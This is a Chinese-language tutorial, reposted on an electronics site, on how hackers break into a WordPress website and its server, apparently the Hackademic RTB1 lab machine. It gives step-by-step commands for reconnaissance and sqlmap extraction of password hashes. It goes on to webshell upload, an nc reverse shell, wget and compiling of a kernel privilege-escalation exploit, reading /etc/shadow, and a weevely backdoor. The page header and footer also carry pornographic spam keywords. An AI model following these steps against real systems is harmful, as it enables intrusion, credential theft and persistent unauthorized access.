在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

黑客常用的入手思路和技術手法

Android編程精選 ? 來源:Android編程精選 ? 作者:Android編程精選 ? 2022-07-27 10:44 ? 次閱讀

通過本文你將了解黑客常用的入手思路和技術手法,適合熱愛網絡信息安全的新手朋友了解學習。本文將從最開始的信息收集開始講述黑客是如何一步步的攻破你的網站和服務器的。閱讀本文你會學到以下內容: 1.滲透測試前的簡單信息收集。 2.sqlmap的使用 3.nmap的使用 4.nc反彈提權 5.linux系統的權限提升 6.backtrack 5中滲透測試工具nikto和w3af的使用等. 假設黑客要入侵的你的網站域名為:hack-test.com 讓我們用ping命令獲取網站服務器的IP地址 564710fa-0cd9-11ed-ba43-dac502259ad0.jpg ? 現在我們獲取了網站服務器的IP地址為:173.236.138.113 ? 尋找同一服務器上的其它網站,我們使用sameip.org. ? 5664df0e-0cd9-11ed-ba43-dac502259ad0.jpg ? 26 sites hosted on IP Address 173.236.138.113 ?

ID Domain Site Link
1 hijackthisforum.com hijackthisforum.com
2 sportforum.net sportforum.net
3 freeonlinesudoku.net freeonlinesudoku.net
4 cosplayhell.com cosplayhell.com
5 videogamenews.org videogamenews.org
6 gametour.com gametour.com
7 qualitypetsitting.net qualitypetsitting.net
8 brendanichols.com brendanichols.com
9 8ez.com 8ez.com
10 hack-test.com hack-test.com
11 kisax.com kisax.com
12 paisans.com paisans.com
13 mghz.com mghz.com
14 debateful.com debateful.com
15 jazzygoodtimes.com jazzygoodtimes.com
16 fruny.com fruny.com
17 vbum.com vbum.com
18 wuckie.com wuckie.com
19 force5inc.com force5inc.com
20 virushero.com virushero.com
21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com
22 jennieko.com jennieko.com
23 davereedy.com davereedy.com
24 joygarrido.com joygarrido.com
25 prismapp.com prismapp.com
26 utiligolf.com utiligolf.com

173.236.138.113上有26個網站,很多黑客為了攻破你的網站可能會檢查同服務器上的其它網站,但是本次是以研究為目標,我們將拋開服務器上的其它網站,只針對你的網站來進行入侵檢測。 我們需要關于你網站的以下信息: 1. DNS records (A, NS, TXT, MX and SOA) 2. Web Server Type (Apache, IIS, Tomcat) 3. Registrar (the company that owns your domain) 4. Your name, address, email and phone 5. Scripts that your site uses (php, asp, asp.net, jsp, cfm) 6. Your server OS (Unix,Linux,Windows,Solaris) 7. Your server open ports to internet (80, 443, 21, etc.) 讓我們開始找你網站的DNS記錄,我們用who.is來完成這一目標. 56858178-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們發現你的DNS記錄如下 ? 5694affe-0cd9-11ed-ba43-dac502259ad0.jpg ? ?讓我們來確定web服務器的類型 ? 56a853ec-0cd9-11ed-ba43-dac502259ad0.jpg ? 發現你的Web服務器是apache,接下來確定它的版本. ? ?IP:?173.236.138.113 Website Status:?active Server Type: Apache Alexa Trend/Rank:??1 Month:3,213,968 3 Month: 2,161,753 Page Views per Visit:??1 Month: 2.0 3Month: 3.7 ? 接下來是時候尋找你網站域名的注冊信息,你的電話、郵箱、地址等. ? 56babc26-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們現在已經獲取了你的網站域名的注冊信息,包括你的重要信息等. ? 我們可以通過backtrack5中的whatweb來獲取你的網站服務器操作系統類型和服務器的版本. ? 56da4eec-0cd9-11ed-ba43-dac502259ad0.png56f80b3a-0cd9-11ed-ba43-dac502259ad0.png ? 我們發現你的網站使用了著名的php整站程序wordpress,服務器的的系統類型為FedoraLinux,Web服務器版本Apache 2.2.15.繼續查看網站服務器開放的端口,用滲透測試工具nmap: ? 1-Find services that run on server(查看服務器上運行的服務) ? 570b3a8e-0cd9-11ed-ba43-dac502259ad0.jpg ? 2-Find server OS(查看操作系統版本) ? 5729e0ce-0cd9-11ed-ba43-dac502259ad0.jpg ? 只有80端口是開放的,操作系統是Linux2.6.22(Fedora Core 6),現在我們已經收集了所有關于你網站的重要信息,接下來開始掃描尋找漏洞,比如: ? Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等. ? 我們將使用Nikto來收集漏洞信息: ? root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com ? 574a97c4-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們也會用到Backtrack 5 R1中的W3AF 工具: ? root@bt:/pentest/web/w3af#./w3af_gui ? 575f3b0c-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們輸入要檢測的網站地址,選擇完整的安全審計選項. ? 57719b26-0cd9-11ed-ba43-dac502259ad0.jpg ? 稍等一會,你將會看到掃描結果. ? 57880e9c-0cd9-11ed-ba43-dac502259ad0.jpg ? ?發現你的網站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞. ? http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 ? 我們通過工具發現這個URL存在SQL注入,我們通過Sqlmap來檢測這個url. ? Using sqlmap with –u url ? 57a40dc2-0cd9-11ed-ba43-dac502259ad0.png ? 過一會你會看到 ? 57b490de-0cd9-11ed-ba43-dac502259ad0.png ? 輸入N按回車鍵繼續 ? 57d2e2b4-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們發現你的網站存在mysql顯錯注入,mysql數據庫版本是5.0. 我們通過加入參數”-dbs”來嘗試采集數據庫名. ? 57e7e38a-0cd9-11ed-ba43-dac502259ad0.png ? 57fe3a40-0cd9-11ed-ba43-dac502259ad0.png ? 發現三個數據庫,接下來通過參數”-D wordpress -tables”來查看wordpress數據庫的所有表名 ? 580bb1fc-0cd9-11ed-ba43-dac502259ad0.png ? 582612ea-0cd9-11ed-ba43-dac502259ad0.jpg ? 通過參數“-T wp_users –columns ”來查看wp_users表中的字段. ? 583be868-0cd9-11ed-ba43-dac502259ad0.png ? 584ed6a8-0cd9-11ed-ba43-dac502259ad0.jpg ? 接下來猜解字段user_login和user_pass的值.用參數”-C user_login,user_pass–dump” ? 5861a9ea-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們會發現用戶名和密碼hashes值. 我們需要通過以下在線破解網站來破解密碼hashes ? http://www.onlinehashcrack.com/free-hash-reverse.php ? 5879bfa8-0cd9-11ed-ba43-dac502259ad0.png 登陸wordpress的后臺wp-admin ? 嘗試上傳php webshell到服務器,以方便運行一些linux命令.在插件頁面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點擊更新文件,然后訪問我們的phpwebshell. ? 5889a814-0cd9-11ed-ba43-dac502259ad0.jpg58a26c46-0cd9-11ed-ba43-dac502259ad0.jpg ? Phpwebshell被解析了,我們可以控制你網站的文件,但是我們只希望獲得網站服務器的root權限,來入侵服務器上其它的網站。 ? 我們用NC來反彈一個shell,首先在我們的電腦上監聽5555端口. ? 58b0851a-0cd9-11ed-ba43-dac502259ad0.png ? 然后在Php webshell上反向連接我們的電腦,輸入你的IP和端口5555. ? 58c6be0c-0cd9-11ed-ba43-dac502259ad0.jpg 點擊連接我們會看到 ? 58e26238-0cd9-11ed-ba43-dac502259ad0.png ? 接下來我們嘗試執行一些命令:

id
uid=48(apache) gid=489(apache) groups=489(apache) (用來顯示用戶的id和組)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins (顯示服務器上當前的路徑)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 72145 EST 2009 i686 i686 i386 GNU/Linux
(顯示內核版本信息) 58f7fc42-0cd9-11ed-ba43-dac502259ad0.jpg ? 現在我們知道,服務器的內核版本是2.6.31.5-127.fc12.1686,我們在exploit-db.com中搜索此版本的相關漏洞.
在服務器上測試了很多exp之后,我們用以下的exp來提升權限. http://www.exploit-db.com/exploits/15285 我們在nc shell上執行以下命令: wgethttp://www.exploit-db.com/exploits/15285 -o roro.c (下載exp到服務器并重命名為roro.c)
注:很多linux內核的exp都是C語言開發的,因此我們保存為.c擴展名.
exp roro.c代碼如下:

#include#include#include#include#include#include#include#include#include#include#include#define RECVPORT 5555#define SENDPORT 6666int prep_sock(int port){int s, ret;struct sockaddr_in addr;s = socket(PF_RDS, SOCK_SEQPACKET, 0);if(s < 0){printf(“[*] Could not open socket.”);exit(-1);}memset(&addr, 0, sizeof(addr));
通過以上代碼我們發現該exp是C語言開發的,我們需要將它編譯成elf格式的,命令如下: gcc roro.c –ororo 接下來執行編譯好的exp ./roro 5914aed2-0cd9-11ed-ba43-dac502259ad0.jpg ? 執行完成之后我們輸入id命令
id
我們發現我們已經是root權限了
uid=0(root) gid=0(root) 592c7152-0cd9-11ed-ba43-dac502259ad0.png ? 現在我們可以查看/etc/shadow文件
cat/etc/shadow 5944a060-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們可以使用”john theripper”工具破解所有用戶的密碼.但是我們不會這樣做,我們需要在這個服務器上留下后門以方便我們在任何時候訪問它. ? 我們用weevely制作一個php小馬上傳到服務器上. ? 1.weevely使用選項
root@bt:/pentest/backdoors/web/weevely#./main.py - 59623c38-0cd9-11ed-ba43-dac502259ad0.jpg ? 2.用weevely創建一個密碼為koko的php后門 ? root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko ? 596fae04-0cd9-11ed-ba43-dac502259ad0.jpg ? 接下來上傳到服務器之后來使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko 598135de-0cd9-11ed-ba43-dac502259ad0.jpg ? 測試我們的hax.php后門 ? 5993ec4c-0cd9-11ed-ba43-dac502259ad0.jpg
審核編輯:彭靜
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 服務器
    +關注

    關注

    12

    文章

    9308

    瀏覽量

    86071
  • 黑客
    +關注

    關注

    3

    文章

    284

    瀏覽量

    21928
  • 網絡信息
    +關注

    關注

    0

    文章

    28

    瀏覽量

    10310

原文標題:黑客是如何攻破一個網站的?

文章出處:【微信號:AndroidPush,微信公眾號:Android編程精選】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    監控平臺設計思路

    電子發燒友網站提供《監控平臺設計思路.pptx》資料免費下載
    發表于 10-09 11:18 ?0次下載

    SiRider S1芯擎工業開發板測評+1.防止黑客入侵通信監控系統(PSA)

    選!當然啦,如果你覺得它太厲害了有點害怕的話,那就把它想象成一個友好的機器人伙伴吧,它會一直陪伴你走過每一個技術難關的! 接下來咱們開始一起使用SiRider S1防止黑客監控吧!這事兒聽起來挺嚴肅
    發表于 09-08 21:58

    FP8模型訓練中Debug優化思路

    目前,市場上許多公司都積極開展基于 FP8 的大模型訓練,以提高計算效率和性能。在此,我們整理并總結了客戶及 NVIDIA 技術團隊在 FP8 模型訓練過程中的 debug 思路和方法,供大家參考。
    的頭像 發表于 09-06 14:36 ?417次閱讀
    FP8模型訓練中Debug優化<b class='flag-5'>思路</b>

    stm32l431怎么驅動段碼屏?

    有沒有大佬能說一下這個屏幕是怎么驅動的?代碼應該怎么入手編寫?現在絲毫沒有思路,不知道從何入手,好像是長沙太陽人電子有限公司 的斷碼屏幕,但是沒有在官網上找到什么資料,求助[/tr]
    發表于 07-17 06:48

    請教延時電路的設計思路

    想設計一套延時啟動電路. 請老師們提供下思路 使用機械定時器, (電風扇的定時器) , 當定時結束時, 電機開始工作. 望賜教. 謝謝
    發表于 06-25 22:15

    AMD遇黑客攻擊,但稱運營無大礙

    近日,科技圈傳來一則震驚的消息:全球知名的半導體制造商AMD公司遭遇了黑客組織的攻擊。據悉,一個名為Intelbroker的黑客組織成功入侵了AMD的系統,并盜取了包括未來產品詳細信息、客戶數據庫、財務記錄、源代碼、固件等一系列敏感信息。
    的頭像 發表于 06-24 11:00 ?569次閱讀

    環球晶遭黑客攻擊!

    6月14日消息,環球晶6月13日發布公告,稱部分資訊系統遭受黑客攻擊,目前正積極會同技術專家協助調查和復原工作。環球晶表示,少數廠區部分產線受到影響,將會先使用庫存出貨因應,若有不足,有的可能要延遲
    的頭像 發表于 06-14 16:27 ?580次閱讀
    環球晶遭<b class='flag-5'>黑客</b>攻擊!

    一種 IT 和 OT 安全融合的思路

    摘 要 數字化、網絡化、智能化加速發展,使得信息技術(Information Technology,IT)與操作技術(Operation Technology,OT)融合成為工業數字化轉型和制造業
    的頭像 發表于 05-09 11:16 ?567次閱讀

    面向混合集成電路的數字化研制目標和思路

    混合集成電路產品數字化研制總體思路是:堅持“模型”是核心、“模型貫穿”是主線、“模型構建與仿真驗證”是主要抓手的總體思路
    的頭像 發表于 04-17 11:26 ?900次閱讀
    面向混合集成電路的數字化研制目標和<b class='flag-5'>思路</b>

    怎么從振子入手分析天線

    我的思路是這樣的,首先通過對傳輸線中電荷或者載流子的分析,弄清楚他們基本的受力過程是怎么樣的,傳統的傳輸線為什么不能輻射。 然后是怎么破壞約束輻射的條件、或者輻射的條件是什么;怎么形成天線。
    發表于 04-07 10:18 ?665次閱讀
    怎么從振子<b class='flag-5'>入手</b>分析天線

    如何構筑身份安全防線,避免被黑客“登入”企業網絡?

    黑客常用的攻擊手段,從用盡十八般武藝、不可告人的“侵入”,變成憑借有效賬戶、大搖大擺的“登入”,你會不會覺得不可思議?
    的頭像 發表于 03-28 13:44 ?604次閱讀
    如何構筑身份安全防線,避免被<b class='flag-5'>黑客</b>“登入”企業網絡?

    特斯拉修補黑客競賽發現的漏洞,Pwn2Own助其領先安全領域

    作為領先電動車品牌,特斯拉始終重視網絡安全,并且與白帽黑客建立伙伴關系。為此,特斯拉依托Pwn2Own等黑客賽事平臺,以重金獎勵挖掘漏洞以彌補隱患。這一措施取得良好成效,數百個漏洞已在發現前被及時修復。
    的頭像 發表于 03-22 11:35 ?545次閱讀

    自學STM32的話應該從哪入手

    麻煩問一下自學STM32應該怎樣入手呢,很多庫文件引用有點看不懂,是要從51開始學起嗎
    發表于 03-21 09:28

    請求黑客幫忙

    請問這里有沒有可以幫我恢復之前已刪除的微信聊天記錄黑客高手啊?
    發表于 03-09 12:05

    MAVLink在應用編程中的編程原理和思路

    嵌入式開發過程中,UART、 CAN、 USB等通信基本離不開通信協議。 下面給大家分享一種通信協議(MAVLink)在應用編程中的編程原理和思路
    發表于 03-08 12:45 ?1059次閱讀
    MAVLink在應用編程中的編程原理和<b class='flag-5'>思路</b>
    主站蜘蛛池模板: 欧美成人a视频 | 综合五月激情 | 欧美精品啪啪 | 久久久精品免费热线观看 | 久久久久久久久久久9精品视频 | 伊人网址| 午夜精品网站 | 综合五月婷婷 | 四虎影视在线观看 | 毛片网站免费在线观看 | 欧美一级淫片免费播放口 | 久久久久无码国产精品一区 | 国产精品免费视频拍拍拍 | 四虎最新紧急入口 | 亚洲三级毛片 | 五月天亚洲综合 | 免费看美女的逼 | 日韩欧美中文字幕在线视频 | 一级片免费在线播放 | 免费看欧美一级特黄a大片一 | 欧美性色综合网 | 久久久久女人精品毛片九一 | 午夜免费网址 | 人人干在线 | 色色色色色色色色色色色色 | 色噜噜成人综合网站 | 欧美一级视频高清片 | 手机国产看片 | 种子天堂bt磁力在线资源 | 在线 | 一区二区三区四区 | 亚洲国产成人最新精品资源 | 成年啪啪网站免费播放看 | 国产小视频在线观看 | 国产欧美一区二区三区观看 | 天堂资源中文在线 | 扒开双腿猛进湿润18p | 午夜看看| 欧美黄色大片免费 | 99成人国产精品视频 | 在线观看免费午夜大片 | 国模无水印一区二区三区 |